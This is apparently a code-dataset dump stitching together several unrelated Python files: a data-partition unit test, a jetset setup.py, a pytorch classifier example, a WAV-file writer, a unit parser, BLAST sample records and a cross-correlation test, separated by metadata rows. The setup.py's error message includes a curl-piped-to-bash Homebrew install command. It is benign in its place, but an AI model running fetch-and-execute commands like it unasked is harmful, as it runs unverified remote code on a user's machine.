absolute_partition = corpus.make_object(CdmObjectType.DATA_PARTITION_DEF, 'absolute partition')
absolute_partition.location = 'local:/absolute/path'
# add an empty arguments list to test empty list should not be displayed in ToData json.
absolute_partition.arguments['test'] = []
entity.data_partitions.append(relative_partition)
entity.data_partitions.append(absolute_partition)
manifest_data = ManifestPersistence.to_data(manifest, None, None)
self.assertEqual(len(manifest_data.entities), 1)
entityData = manifest_data.entities[0]
partitions_list = entityData.dataPartitions
self.assertEqual(len(partitions_list), 2)
relative_partition_data = partitions_list[0]
absolute_partition_data = partitions_list[-1]
self.assertEqual(relative_partition_data.location, relative_partition.location)
arguments_list = relative_partition_data.arguments
self.assertEqual(3, len(arguments_list))
checked_arguments = []
for argument in arguments_list:
self.assertEqual(3, len(argument))
checked_arguments.append(argument.value)
if argument.value == 'argument1':
self.assertEqual('test1', argument.name)
elif argument.value == 'argument2':
self.assertEqual('test2', argument.name)
elif argument.value == 'argument3':
self.assertEqual('test2', argument.name)
else:
raise Exception('unexpected argument in data partitions')
self.assertTrue('argument1' in checked_arguments)
self.assertTrue('argument2' in checked_arguments)
self.assertTrue('argument3' in checked_arguments)
self.assertEqual(absolute_partition_data.location, absolute_partition.location)
# test if empty argument list is set to null
self.assertEqual(absolute_partition_data.arguments, None)
@async_test
async def test_from_incremental_partition_without_trait(self):
"""
Testing loading manifest with local entity declaration having an incremental partition without incremental trait.
"""
corpus = TestHelper.get_local_corpus(self.test_subpath, 'test_from_incremental_partition_without_trait')
error_message_verified = False
        # not checking the CdmLogCode here as we want to check that this error message is constructed correctly for the partition (it shares the same CdmLogCode with the partition pattern)
def callback(level, message):
if 'Failed to persist object \'DeletePartition\'. This object does not contain the trait \'is.partition.incremental\', so it should not be in the collection \'incremental_partitions\'. | from_data' in message:
nonlocal error_message_verified
error_message_verified = True
else:
self.fail('Some unexpected failure - {}!'.format(message))
corpus.set_event_callback(callback, CdmStatusLevel.WARNING)
manifest = await corpus.fetch_object_async('local:/entities.manifest.cdm.json')
self.assertEqual(1, len(manifest.entities))
self.assertEqual(CdmObjectType.LOCAL_ENTITY_DECLARATION_DEF, manifest.entities[0].object_type)
entity = manifest.entities[0]
self.assertEqual(1, len(entity.incremental_partitions))
incremental_partition = entity.incremental_partitions[0]
self.assertEqual('UpsertPartition', incremental_partition.name)
self.assertEqual(1, len(incremental_partition.exhibits_traits))
self.assertEqual(Constants._INCREMENTAL_TRAIT_NAME, incremental_partition.exhibits_traits[0].fetch_object_definition_name())
self.assertTrue(error_message_verified)
@async_test
async def test_from_data_partition_with_incremental_trait(self):
"""
Testing loading manifest with local entity declaration having a data partition with incremental trait.
"""
corpus = TestHelper.get_local_corpus(self.test_subpath, 'test_from_data_partition_with_incremental_trait')
error_message_verified = False
        # not checking the CdmLogCode here as we want to check that this error message is constructed correctly for the partition (it shares the same CdmLogCode with the partition pattern)
def callback(level, message):
if 'Failed to persist object \'UpsertPartition\'. This object contains the trait \'is.partition.incremental\', so it should not be in the collection \'data_partitions\'. | from_data' in message:
nonlocal error_message_verified
error_message_verified = True
else:
self.fail('Some unexpected failure - {}!'.format(message))
corpus.set_event_callback(callback, CdmStatusLevel.WARNING)
manifest = await corpus.fetch_object_async('local:/entities.manifest.cdm.json')
self.assertEqual(1, len(manifest.entities))
self.assertEqual(CdmObjectType.LOCAL_ENTITY_DECLARATION_DEF, manifest.entities[0].object_type)
entity = manifest.entities[0]
self.assertEqual(1, len(entity.data_partitions))
self.assertEqual('TestingPartition', entity.data_partitions[0].name)
self.assertTrue(error_message_verified)
@async_test
async def test_to_incremental_partition_without_trait(self):
"""
Testing saving manifest with local entity declaration having an incremental partition without incremental trait.
"""
test_name = 'test_to_incremental_partition_without_trait'
corpus = TestHelper.get_local_corpus(self.test_subpath, test_name)
error_message_verified = False
        # not checking the CdmLogCode here as we want to check that this error message is constructed correctly for the partition (it shares the same CdmLogCode with the partition pattern)
def callback(level, message):
if 'Failed to persist object \'DeletePartition\'. This object does not contain the trait \'is.partition.incremental\', so it should not be in the collection \'incremental_partitions\'. | to_data' in message:
nonlocal error_message_verified
error_message_verified = True
else:
self.fail('Some unexpected failure - {}!'.format(message))
corpus.set_event_callback(callback, CdmStatusLevel.WARNING)
manifest = CdmManifestDefinition(corpus.ctx, 'manifest')
corpus.storage.fetch_root_folder('local').documents.append(manifest)
entity = CdmEntityDefinition(corpus.ctx, 'entityName', None)
create_document_for_entity(corpus, entity)
localized_entity_declaration = manifest.entities.append(entity)
upsert_incremental_partition = corpus.make_object(CdmObjectType.DATA_PARTITION_DEF, 'UpsertPartition', False)
upsert_incremental_partition.location = '/IncrementalData'
upsert_incremental_partition.specialized_schema = 'csv'
upsert_incremental_partition.exhibits_traits.append(Constants._INCREMENTAL_TRAIT_NAME, [['type', CdmIncrementalPartitionType.UPSERT.value]])
delete_partition = corpus.make_object(CdmObjectType.DATA_PARTITION_DEF, 'DeletePartition', False)
delete_partition.location = '/IncrementalData'
delete_partition.specialized_schema = 'csv'
localized_entity_declaration.incremental_partitions.append(upsert_incremental_partition)
localized_entity_declaration.incremental_partitions.append(delete_partition)
with logger._enter_scope(DataPartitionTest.__name__, corpus.ctx, test_name):
manifest_data = ManifestPersistence.to_data(manifest, None, None)
self.assertEqual(1, len(manifest_data.entities))
entity_data = manifest_data.entities[0]
self.assertEqual(1, len(entity_data.incrementalPartitions))
partition_data = entity_data.incrementalPartitions[0]
self.assertEqual('UpsertPartition', partition_data.name)
self.assertEqual(1, len(partition_data.exhibitsTraits))
self.assertEqual(Constants._INCREMENTAL_TRAIT_NAME, partition_data.exhibitsTraits[0].traitReference)
self.assertTrue(error_message_verified)
@async_test
async def test_to_data_partition_with_incremental_trait(self):
"""
Testing saving manifest with local entity declaration having a data partition with incremental trait.
"""
test_name = 'test_to_data_partition_with_incremental_trait'
corpus = TestHelper.get_local_corpus(self.test_subpath, test_name)
error_message_verified = False
        # not checking the CdmLogCode here as we want to check that this error message is constructed correctly for the partition (it shares the same CdmLogCode with the partition pattern)
def callback(level, message):
if 'Failed to persist object \'UpsertPartition\'. This object contains the trait \'is.partition.incremental\', so it should not be in the collection \'data_partitions\'. | to_data' in message:
nonlocal error_message_verified
error_message_verified = True
else:
self.fail('Some unexpected failure - {}!'.format(message))
corpus.set_event_callback(callback, CdmStatusLevel.WARNING)
manifest = CdmManifestDefinition(corpus.ctx, 'manifest')
corpus.storage.fetch_root_folder('local').documents.append(manifest)
entity = CdmEntityDefinition(corpus.ctx, 'entityName', None)
create_document_for_entity(corpus, entity)
localized_entity_declaration = manifest.entities.append(entity)
upsert_incremental_partition = corpus.make_object(CdmObjectType.DATA_PARTITION_DEF, 'UpsertPartition',
False)
upsert_incremental_partition.location = '/IncrementalData'
upsert_incremental_partition.specialized_schema = 'csv'
upsert_incremental_partition.exhibits_traits.append(Constants._INCREMENTAL_TRAIT_NAME,
[['type', CdmIncrementalPartitionType.UPSERT.value]])
delete_partition = corpus.make_object(CdmObjectType.DATA_PARTITION_DEF, 'TestingPartition', False)
delete_partition.location = '/testingData'
delete_partition.specialized_schema = 'csv'
localized_entity_declaration.data_partitions.append(upsert_incremental_partition)
localized_entity_declaration.data_partitions.append(delete_partition)
with logger._enter_scope(DataPartitionTest.__name__, corpus.ctx, test_name):
manifest_data = ManifestPersistence.to_data(manifest, None, None)
self.assertEqual(1, len(manifest_data.entities))
entity_data = manifest_data.entities[0]
self.assertEqual(1, len(entity_data.dataPartitions))
partition_data = entity_data.dataPartitions[0]
self.assertEqual('TestingPartition', partition_data.name)
self.assertTrue(error_message_verified)
| 56.454902
| 221
| 0.727077
| 13,675
| 0.949785
| 0
| 0
| 13,519
| 0.93895
| 13,423
| 0.932282
| 3,632
| 0.252257
|
9fd1f014c5d5b7866e50185659805f63bd40ebd9
| 6,038
|
py
|
Python
|
setup.py
|
andreatramacere/jetset
|
4b7859622db9713b6ee243e2c12ec81321b372bf
|
[
"BSD-3-Clause"
] | 16
|
2019-02-11T06:58:43.000Z
|
2021-12-28T13:00:35.000Z
|
setup.py
|
andreatramacere/jetset
|
4b7859622db9713b6ee243e2c12ec81321b372bf
|
[
"BSD-3-Clause"
] | 14
|
2019-04-14T14:49:55.000Z
|
2021-12-27T04:18:24.000Z
|
setup.py
|
andreatramacere/jetset
|
4b7859622db9713b6ee243e2c12ec81321b372bf
|
[
"BSD-3-Clause"
] | 10
|
2019-02-25T14:53:28.000Z
|
2022-03-02T08:49:19.000Z
|
#!/usr/bin/env python
from __future__ import division, absolute_import, print_function
__author__ = 'andrea tramacere'
from setuptools import setup, find_packages,Extension
# from setuptools.command.install import install
# from distutils.extension import Extension
# import distutils.command.install as orig
from distutils.command.build import build
from setuptools.command.install import install
from distutils.sysconfig import get_python_lib
import os
import glob
import shutil
import fnmatch
import json
import sys
def check_swig():
command = 'swig'
if shutil.which(command) is None:
_mess = """
***********************************************************************************************************
*** you need to install swig v>=3.0.0 to install from source ***
*** ***
*** - on linux Ubuntu: sudo apt-get install swig ***
*** ***
*** - on linux Debian: sudo aptitude install swig ***
*** ***
*** - on linux Fedora: sudo yum install swig ***
*** ***
*** - on mac: ***
*** /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)" ***
*** brew install swig ***
*** ***
*** visit: http://www.swig.org/ for more info ***
***********************************************************************************************************
"""
raise RuntimeError(_mess)
class CustomBuild(build):
def run(self):
print('-> custom build')
check_swig()
self.run_command('build_ext')
build.run(self)
class CustomInstall(install):
def run(self):
print('-> custom install',self.get_command_name())
check_swig()
self.run_command('build_ext')
install.run(self)
print ('JETSETBESSELBUILD',os.getenv('JETSETBESSELBUILD') == 'TRUE')
if os.getenv('JETSETBESSELBUILD') == 'TRUE':
self.run_command('test')
else:
pass
class CustomClean(install):
def run(self):
try:
shutil.rmtree('dist')
except:
pass
try:
shutil.rmtree('build')
except:
pass
try:
shutil.rmtree(glob.glob('*.egg-info')[0])
except:
pass
try:
os.remove('jetset/jetkernel/jetkernel.py')
except:
pass
try:
os.remove('jetset/jetkernel/jetkernel_wrap.c')
except:
pass
try:
shutil.rmtree('jetset/jetkernel/__pycache__')
except:
pass
# to remove files installed by old versions
site_p=get_python_lib()
for f in glob.glob(site_p+'/*_jetkernel*'):
print ('found .so object:', f)
print ('removing it')
try:
os.remove(f)
except:
pass
custom_cmdclass = {'build': CustomBuild,
'install': CustomInstall,
'clean':CustomClean}
with open('jetset/pkg_info.json') as fp:
_info = json.load(fp)
__version__ = _info['version']
f = open("./requirements.txt",'r')
req=f.readlines()
f.close()
req=[n.strip() for n in req if n.startswith('#') is False]
src_files=['jetset/jetkernel/jetkernel.i']
src_files.extend(glob.glob ('jetkernel_src/src/*.c'))
_module=Extension('jetset.jetkernel/_jetkernel',
sources=src_files,
#extra_compile_options='-fPIC -v -c -m64 -I',
#extra_link_options='-suppress',
swig_opts=['-v','-threads'],
include_dirs=['jetkernel_src/include'])
if os.getenv('JETSETBESSELBUILD') == 'TRUE':
_test_suite = 'jetset.tests.test_build_functions'
else:
_test_suite = None
with open("proj_descr.md", "r") as f:
long_description = f.read()
# skip the pip requirements when installing the source package from within conda
is_conda = os.path.exists(os.path.join(sys.prefix, 'conda-meta'))
if is_conda:
install_req=None
else:
install_req=req
print('-> version', __version__, install_req)
setup(name='jetset',
version=__version__,
author='Andrea Tramacere',
url='https://github.com/andreatramacere/jetset',
long_description=long_description,
long_description_content_type='text/markdown',
description="A framework for self-consistent modeling and fitting of astrophysical relativistic jets SEDs",
author_email='andrea.tramacere@gmail.com',
packages=['jetset', 'jetset.leastsqbound', 'jetset.jetkernel','jetset.tests'],
package_data={'jetset':['Spectral_Templates_Repo/*.dat','test_data/SEDs_data/*ecsv','./requirements.txt','ebl_data/*','mathkernel/*dat'],'jetkernel':['mathkernel/*dat']},
include_package_data = True,
cmdclass=custom_cmdclass,
ext_modules = [_module],
install_requires=install_req,
py_modules=['jetset.jetkernel/jetkernel'],
python_requires='>=3.7',
test_suite =_test_suite,
zip_safe=True)
| 34.901734
| 176
| 0.48791
| 1,469
| 0.243292
| 0
| 0
| 0
| 0
| 0
| 0
| 3,190
| 0.528321
|
9fd494efb313bbd651da7b57c11d4c1658a52fc3
| 1,610
|
py
|
Python
|
example/torch_classifier.py
|
KevinEloff/deep-chain-apps
|
0952845e93f0c0592f04275fe99b122ff831901f
|
[
"Apache-1.1"
] | null | null | null |
example/torch_classifier.py
|
KevinEloff/deep-chain-apps
|
0952845e93f0c0592f04275fe99b122ff831901f
|
[
"Apache-1.1"
] | null | null | null |
example/torch_classifier.py
|
KevinEloff/deep-chain-apps
|
0952845e93f0c0592f04275fe99b122ff831901f
|
[
"Apache-1.1"
] | null | null | null |
"""
Module that provides a classifier template to train a model on embeddings.
We use the pathogen vs human dataset as an example. The embeddings of 100k proteins come
from the protBert model.
The model is built with pytorch_lightning, a wrapper on top of
pytorch (similar to keras with tensorflow).
Feel free to build your own model if you want a more complex one.
"""
from deepchain.dataset import load_pathogen_dataset
from deepchain.models import MLP
from deepchain.models.utils import (
confusion_matrix_plot,
dataloader_from_numpy,
model_evaluation_accuracy,
)
from sklearn.model_selection import train_test_split
# Load embedding and target dataset
X, y = load_pathogen_dataset()
X_train, X_val, y_train, y_val = train_test_split(X, y, test_size=0.3)
train_dataloader = dataloader_from_numpy(X_train, y_train, batch_size=32)
test_dataloader = dataloader_from_numpy(X_val, y_val, batch_size=32)
# Build a multi-layer-perceptron on top of embedding
# The fit method can handle all the arguments available in the
# 'trainer' class of pytorch lightning:
# https://pytorch-lightning.readthedocs.io/en/latest/common/trainer.html
# Example arguments:
# * specifies all GPUs regardless of its availability :
# Trainer(gpus=-1, auto_select_gpus=False, max_epochs=20)
mlp = MLP(input_shape=X_train.shape[1])
mlp.fit(train_dataloader, epochs=5)
mlp.save_model("model.pt")
# Model evaluation
prediction, truth = model_evaluation_accuracy(test_dataloader, mlp)
# Plot confusion matrix
confusion_matrix_plot(truth, (prediction > 0.5).astype(int), ["0", "1"])
| 36.590909
| 90
| 0.775776
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 856
| 0.531677
|
9fd54ac2fec1187dcd8824c5cc8a001bad343192
| 5,589
|
py
|
Python
|
towavfile.py
|
streamsoftdev/audiomods
|
0e3d27fcd9af0a0f6a9de512112425e093f82dda
|
[
"Apache-2.0"
] | null | null | null |
towavfile.py
|
streamsoftdev/audiomods
|
0e3d27fcd9af0a0f6a9de512112425e093f82dda
|
[
"Apache-2.0"
] | null | null | null |
towavfile.py
|
streamsoftdev/audiomods
|
0e3d27fcd9af0a0f6a9de512112425e093f82dda
|
[
"Apache-2.0"
] | null | null | null |
#Copyright 2022 Nathan Harwood
#
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
import numpy as np
from pathlib import Path
import struct
from audiomodule.audiomodule import AM_CONTINUE, AM_CYCLIC_UNDERRUN, AM_ERROR, AM_INPUT_REQUIRED, MODULE_ERROR, \
AudioModule, sw_dtype, audiomod, nice_channels, nice_frequency_str, hms2_str
@audiomod
class ToWavFile(AudioModule):
name = "To WAV File"
category = "Signal out"
description = "Write the signal to a WAV file. Supports incremental writing to the WAV file."
def __init__(self, file: str = "",
num_channels: int = 2,
sample_width: int = 2,
**kwargs):
super().__init__(num_outputs=0, in_chs=[num_channels], **kwargs)
self.file = file
self.num_channels = num_channels
self.ready = True
self.wf = None
self.sample_width=sample_width
self.bytes_written=0
self.frames_written=0
self.requires_data = False
self.set_write_dtype()
def set_write_dtype(self):
if self.sample_width == 1:
self.write_dtype = np.int8
self.out_max = (2**7)-1
elif self.sample_width == 2:
self.write_dtype = np.int16
self.out_max = (2**15)-1
elif self.sample_width == 4:
self.out_max = 1.0
self.write_dtype = np.float32
async def next_chunk(self):
return await self.process_next_chunk()
def process_next_chunk(self):
if not self.wf:
return AM_ERROR
underrun,cyclic = self.input_underrun()
if (not self.input_pending()) or underrun:
if cyclic:
return AM_CYCLIC_UNDERRUN
else:
return AM_INPUT_REQUIRED
chunk = self.get_input_chunk().buffer
self.write_chunk(chunk)
return AM_CONTINUE
def write_chunk(self,chunk):
chunk *= self.out_max
interleaved = chunk.flatten()
out_data = interleaved.astype(self.write_dtype).tobytes()
self.frames_written+=len(chunk)
self.bytes_written+=len(chunk)*self.sample_width*self.num_channels
self.wf.write(out_data)
self.update_wav_header()
def update_wav_header(self):
current_pos = self.wf.tell()
self.wf.seek(0)
WAVE_FORMAT_PCM = 0x0001
bytes_to_add = b'RIFF'
_datalength = self.frames_written * self.num_channels * self.sample_width
bytes_to_add += struct.pack('<L4s4sLHHLLHH4s',
36 + _datalength, b'WAVE', b'fmt ', 16,
WAVE_FORMAT_PCM, self.num_channels, int(self.sample_rate),
self.num_channels * int(self.sample_rate) * self.sample_width,
self.num_channels * self.sample_width,
self.sample_width * 8, b'data')
bytes_to_add += struct.pack('<L', _datalength)
self.wf.write(bytes_to_add)
self.wf.seek(current_pos)
def open(self):
super().open()
if self.file != "" and self.file != None:
try:
self.wf = open(self.file, 'wb')
self.update_wav_header()
self.ready = True
except Exception as e:
self.observer.put(
(MODULE_ERROR, (self.mod_id, f"{self.file} could not be written to. {e}."), None))
self.ready = False
def close(self):
if self.get_in_buf(0).size()>0 and self.wf:
chunk = self.get_in_buf(0).get_all()
self.write_chunk(chunk)
super().close()
if self.wf:
self.wf.close()
self.wf = None
def reset(self):
super().reset()
if self.wf:
self.wf.seek(0)
self.bytes_written=0
self.frames_written=0
self.update_wav_header()
def get_widget_params(self):
return super().get_widget_params() | {
'meta_order': ['filename'],
'filename': {
'name': 'Filename',
'value': self.file,
'type': 'write-filename',
'filetypes': [('WAV files','*.wav *.WAV'),("All files","*.*")],
'defaultextension': '.wav'
}
}
def set_widget_params(self, params):
super().set_widget_params(params)
if 'filename' in params:
self.close()
self.file = params['filename']['value']
self.open()
def get_status(self):
if self.wf:
ch = nice_channels(self.num_channels)
status = {
'status':'ready',
'topleft':Path(self.file).name,
'topright':hms2_str(self.frames_written/self.sample_rate),
'bottom':nice_frequency_str(self.sample_rate),
'bottomleft':f"{self.sample_width*8} bit",
'bottomright':ch,
}
else:
status = {
'status':'error',
'bottom':"Valid filename required."
}
return status
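For reference, the header assembled by update_wav_header() is the standard 44-byte RIFF/WAVE preamble. A minimal standalone sketch with assumed example parameters (2 channels, 16-bit PCM at 44.1 kHz, 1000 frames; none of these values come from the module above):
import struct
num_channels, sample_width, sample_rate, frames = 2, 2, 44100, 1000  # assumed example values
data_length = frames * num_channels * sample_width
header = b'RIFF'
header += struct.pack('<L4s4sLHHLLHH4s',
                      36 + data_length, b'WAVE', b'fmt ', 16,
                      0x0001,                                     # WAVE_FORMAT_PCM
                      num_channels, sample_rate,
                      num_channels * sample_rate * sample_width,  # byte rate
                      num_channels * sample_width,                # block align
                      sample_width * 8, b'data')
header += struct.pack('<L', data_length)
assert len(header) == 44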
| 33.668675
| 113
| 0.580247
| 4,753
| 0.85042
| 0
| 0
| 4,763
| 0.85221
| 74
| 0.01324
| 1,083
| 0.193773
|
9fd5c810c4ce10644e6de28ce2355f1bd5e61c6a
| 6,857
|
py
|
Python
|
test/blast/sample_data.py
|
UdoGi/dark-matter
|
3d49e89fa5e81f83144119f6216c5774176d203b
|
[
"MIT"
] | 10
|
2016-03-09T09:43:14.000Z
|
2021-04-03T21:46:12.000Z
|
test/blast/sample_data.py
|
terrycojones/dark-matter
|
67d16f870db6b4239e17e542bc6e3f072dc29c75
|
[
"MIT"
] | 332
|
2015-01-07T12:37:30.000Z
|
2022-01-20T15:48:11.000Z
|
test/blast/sample_data.py
|
terrycojones/dark-matter
|
67d16f870db6b4239e17e542bc6e3f072dc29c75
|
[
"MIT"
] | 4
|
2016-03-08T14:56:39.000Z
|
2021-01-27T08:11:27.000Z
|
# Sample BLAST parameters.
PARAMS = {
'application': 'BLASTN',
'blast_cutoff': [
None,
None
],
'database': 'manx-shearwater',
'database_length': 17465129,
'database_letters': None,
'database_name': [],
'database_sequences': 70016,
'date': '',
'dropoff_1st_pass': [
None,
None
],
'effective_database_length': None,
'effective_hsp_length': 22,
'effective_query_length': None,
'effective_search_space': 382194648.0,
'effective_search_space_used': None,
'frameshift': [
None,
None
],
'gap_penalties': [
5,
2
],
'gap_trigger': [
None,
None
],
'gap_x_dropoff': [
None,
None
],
'gap_x_dropoff_final': [
None,
None
],
'gapped': 0,
'hsps_gapped': None,
'hsps_no_gap': None,
'hsps_prelim_gapped': None,
'hsps_prelim_gapped_attemped': None,
'ka_params': [
0.625,
0.41,
0.78
],
'ka_params_gap': [
None,
None,
None
],
'matrix': '',
'num_good_extends': None,
'num_hits': None,
'num_letters_in_database': 17465129,
'num_seqs_better_e': None,
'num_sequences': None,
'num_sequences_in_database': 70016,
'posted_date': [],
'query': 'GZG3DGY01ASHXW',
'query_id': 'Query_1',
'query_length': 46,
'query_letters': 46,
'reference': 'Stephen F. Altschul, Thomas L. Madden, ...',
'sc_match': 2,
'sc_mismatch': -3,
'threshold': None,
'version': '2.2.28+',
'window_size': None
}
RECORD0 = {
'query': 'id0',
'alignments': [
{
'length': 37000,
'hsps': [
{
'bits': 20,
'sbjct_end': 15400,
'expect': 1e-11,
'sbjct': 'TACCC--CGGCCCGCG-CGGCCGGCTCTCCA',
'sbjct_start': 15362,
'query': 'TACCCTGCGGCCCGCTACGGCTGG-TCTCCA',
'frame': [1, 1],
'query_end': 68,
'query_start': 28
}
],
'title': 'gi|887699|gb|DQ37780 Squirrelpox virus 1296/99',
},
{
'length': 38000,
'hsps': [
{
'bits': 25,
'sbjct_end': 12400,
'expect': 1e-10,
'sbjct': 'TACCC--CGGCCCGCG-CGGCCGGCTCTCCA',
'sbjct_start': 12362,
'query': 'TACCCTGCGGCCCGCTACGGCTGG-TCTCCA',
'frame': [1, 1],
'query_end': 68,
'query_start': 28
}
],
'title': 'gi|887699|gb|DQ37780 Squirrelpox virus 55',
}
]
}
RECORD1 = {
'query': 'id1',
'alignments': [
{
'length': 35000,
'hsps': [
{
'bits': 20,
'sbjct_end': 11400,
'expect': 1e-8,
'sbjct': 'TACCC--CGGCCCGCG-CGGCCGGCTCTCCA',
'sbjct_start': 11362,
'query': 'TACCCTGCGGCCCGCTACGGCTGG-TCTCCA',
'frame': [1, 1],
'query_end': 68,
'query_start': 28
}
],
'title': 'gi|887699|gb|DQ37780 Monkeypox virus 456',
},
{
'length': 35000,
'hsps': [
{
'bits': 20,
'sbjct_end': 10400,
'expect': 1e-7,
'sbjct': 'TACCC--CGGCCCGCG-CGGCCGGCTCTCCA',
'sbjct_start': 10362,
'query': 'TACCCTGCGGCCCGCTACGGCTGG-TCTCCA',
'frame': [1, 1],
'query_end': 68,
'query_start': 28
}
],
'title': 'gi|887699|gb|DQ37780 Mummypox virus 3000 B.C.',
}
]
}
RECORD2 = {
'query': 'id2',
'alignments': [
{
'length': 30000,
'hsps': [
{
'bits': 20,
'sbjct_end': 1400,
'expect': 1e-6,
'sbjct': 'TACCC--CGGCCCGCG-CGGCCGGCTCTCCA',
'sbjct_start': 1362,
'query': 'TACCCTGCGGCCCGCTACGGCTGG-TCTCCA',
'frame': [1, 1],
'query_end': 68,
'query_start': 28
}
],
'title': 'gi|887699|gb|DQ37780 Cowpox virus 15',
}
]
}
# Identical to RECORD2, apart from e-value.
RECORD3 = {
'query': 'id3',
'alignments': [
{
'length': 30000,
'hsps': [
{
'bits': 20,
'sbjct_end': 1400,
'expect': 1e-5,
'sbjct': 'TACCC--CGGCCCGCG-CGGCCGGCTCTCCA',
'sbjct_start': 1362,
'query': 'TACCCTGCGGCCCGCTACGGCTGG-TCTCCA',
'frame': [1, 1],
'query_end': 68,
'query_start': 28
}
],
'title': 'gi|887699|gb|DQ37780 Cowpox virus 15',
}
]
}
RECORD4 = {
'query': 'id4',
'alignments': [
{
'length': 30000,
'hsps': [
{
'bits': 10,
'sbjct_end': 1400,
'expect': 1e-3,
'sbjct': 'TACCC--CGGCCCGCG-CGGCCGGCTCTCCA',
'sbjct_start': 1362,
'query': 'TACCCTGCGGCCCGCTACGGCTGG-TCTCCA',
'frame': [1, 1],
'query_end': 68,
'query_start': 28
},
{
'bits': 5,
'sbjct_end': 1400,
'expect': 1e-2,
'sbjct': 'TACCC--CGGCCCGCG-CGGCCGGCTCTCCA',
'sbjct_start': 1362,
'query': 'TACCCTGCGGCCCGCTACGGCTGG-TCTCCA',
'frame': [1, 1],
'query_end': 68,
'query_start': 28
},
{
'bits': 3,
'sbjct_end': 1400,
'expect': 0.0,
'sbjct': 'TACCC--CGGCCCGCG-CGGCCGGCTCTCCA',
'sbjct_start': 1362,
'query': 'TACCCTGCGGCCCGCTACGGCTGG-TCTCCA',
'frame': [1, 1],
'query_end': 68,
'query_start': 28
}
],
'title': 'gi|887699|gb|DQ37780 Cowpox virus 15',
}
]
}
| 27.538153
| 70
| 0.392737
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,768
| 0.403675
|
9fd7af8273e6b7e9744ade794d211dd5ee462f86
| 420
|
py
|
Python
|
pyrigate/units/parse.py
|
pyrigate/pyrigate
|
366e33ef46ebc7928cf35f2d51ed0855c59d1a68
|
[
"MIT"
] | 1
|
2018-02-03T23:22:20.000Z
|
2018-02-03T23:22:20.000Z
|
pyrigate/units/parse.py
|
pyrigate/pyrigate
|
366e33ef46ebc7928cf35f2d51ed0855c59d1a68
|
[
"MIT"
] | 1
|
2018-05-12T13:55:01.000Z
|
2018-05-13T00:16:23.000Z
|
pyrigate/units/parse.py
|
pyrigate/pyrigate
|
366e33ef46ebc7928cf35f2d51ed0855c59d1a68
|
[
"MIT"
] | 1
|
2019-10-18T12:23:02.000Z
|
2019-10-18T12:23:02.000Z
|
# -*- coding: utf-8 -*-
"""."""
import re
_UNIT_STRING_REGEX = r'^([0-9\.]+)(ml|cl|dl|l)$'
def parse_unit(unit_string):
"""."""
lower_unit_string = unit_string.lower()
match = re.match(_UNIT_STRING_REGEX, lower_unit_string)
if match:
try:
return float(match.group(1)), match.group(2)
except ValueError:
return None, None
else:
return None, None
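A brief usage sketch for parse_unit (the import path follows the file location shown above and assumes the package is importable; the inputs are illustrative):
from pyrigate.units.parse import parse_unit
assert parse_unit('250ml') == (250.0, 'ml')
assert parse_unit('1.5L') == (1.5, 'l')          # input is lower-cased before matching
assert parse_unit('two litres') == (None, None)  # non-matching strings fall through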
| 18.26087
| 59
| 0.57381
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 64
| 0.152381
|
9fd914093a9d2ec4b79940394bc875e521269c52
| 6,659
|
py
|
Python
|
src/mhealth/data_analysis_tests/cross_correlator_test.py
|
hirsch-lab/mhealth
|
ad4287483cee206c7b8ff6216293f19d71296129
|
[
"MIT"
] | 2
|
2021-01-05T10:53:57.000Z
|
2021-02-26T09:15:14.000Z
|
src/mhealth/data_analysis_tests/cross_correlator_test.py
|
hirsch-lab/mhealth
|
ad4287483cee206c7b8ff6216293f19d71296129
|
[
"MIT"
] | 3
|
2020-12-15T11:29:25.000Z
|
2021-05-07T09:18:43.000Z
|
src/mhealth/data_analysis_tests/cross_correlator_test.py
|
hirsch-lab/mhealth
|
ad4287483cee206c7b8ff6216293f19d71296129
|
[
"MIT"
] | null | null | null |
import os
import glob
import unittest
from ..utils import testing
from ..utils import everion_keys
from ..utils.file_helper import FileHelper
from ..utils.data_aggregator import Normalization
from ..visualization.vis_properties import VisProperties
from ..data_analysis.cross_correlator import CrossCorrelator
_MHEALTH_DATA = os.getenv('MHEALTH_DATA', '../../resources')
_MHEALTH_OUT_DIR = os.path.join(_MHEALTH_DATA, 'output')
class CrossCorrelatorTest(testing.TestCase):
in_dir = f'{_MHEALTH_DATA}/vital_signals/'
in_dir_mixed = f'{_MHEALTH_DATA}/mixed_vital_raw_signals/'
out_dir = _MHEALTH_OUT_DIR
correlator = CrossCorrelator()
def test_cross_correlator_daily(self):
out_dir = FileHelper.get_out_dir(in_dir=self.in_dir,
out_dir=self.out_dir,
out_dir_suffix='_daily_cross')
self.correlator.plot_daily_correlations(
VisProperties(in_dir=self.in_dir, out_dir=out_dir,
normalization=Normalization.NONE,
keys={'heart_rate', 'respiration_rate'},
short_keys=everion_keys.SHORT_NAMES_VITAL,
min_scale=0, max_scale=100,
start_idx=0, end_idx=3))
files = list(out_dir.glob("**/*.png"))
self.assertEqual(6, len(files))
def test_cross_correlator_hours_vital(self):
out_dir = FileHelper.get_out_dir(in_dir=self.in_dir,
out_dir=self.out_dir,
out_dir_suffix='_cross')
self.correlator.plot_hourly_correlations(
VisProperties(in_dir=self.in_dir, out_dir=out_dir,
normalization=Normalization.NONE,
keys=everion_keys.MAJOR_VITAL,
short_keys=everion_keys.SHORT_NAMES_VITAL,
min_scale=0, max_scale=100,
start_idx=0, end_idx=3))
files = list(out_dir.glob("**/*.png"))
self.assertEqual(3, len(files))
def test_cross_correlator_hours_mixed_vital_raw(self):
out_dir = FileHelper.get_out_dir(in_dir=self.in_dir_mixed,
out_dir=self.out_dir,
out_dir_suffix='_cross')
self.correlator.plot_hourly_correlations(
VisProperties(in_dir=self.in_dir_mixed, out_dir=out_dir,
normalization=Normalization.NONE,
keys=everion_keys.MAJOR_MIXED_VITAL_RAW,
short_keys=everion_keys.SHORT_NAMES_MIXED_VITAL_RAW,
min_scale=0, max_scale=100,
start_idx=0, end_idx=3))
files = list(out_dir.glob("**/*.png"))
self.assertEqual(5, len(files))
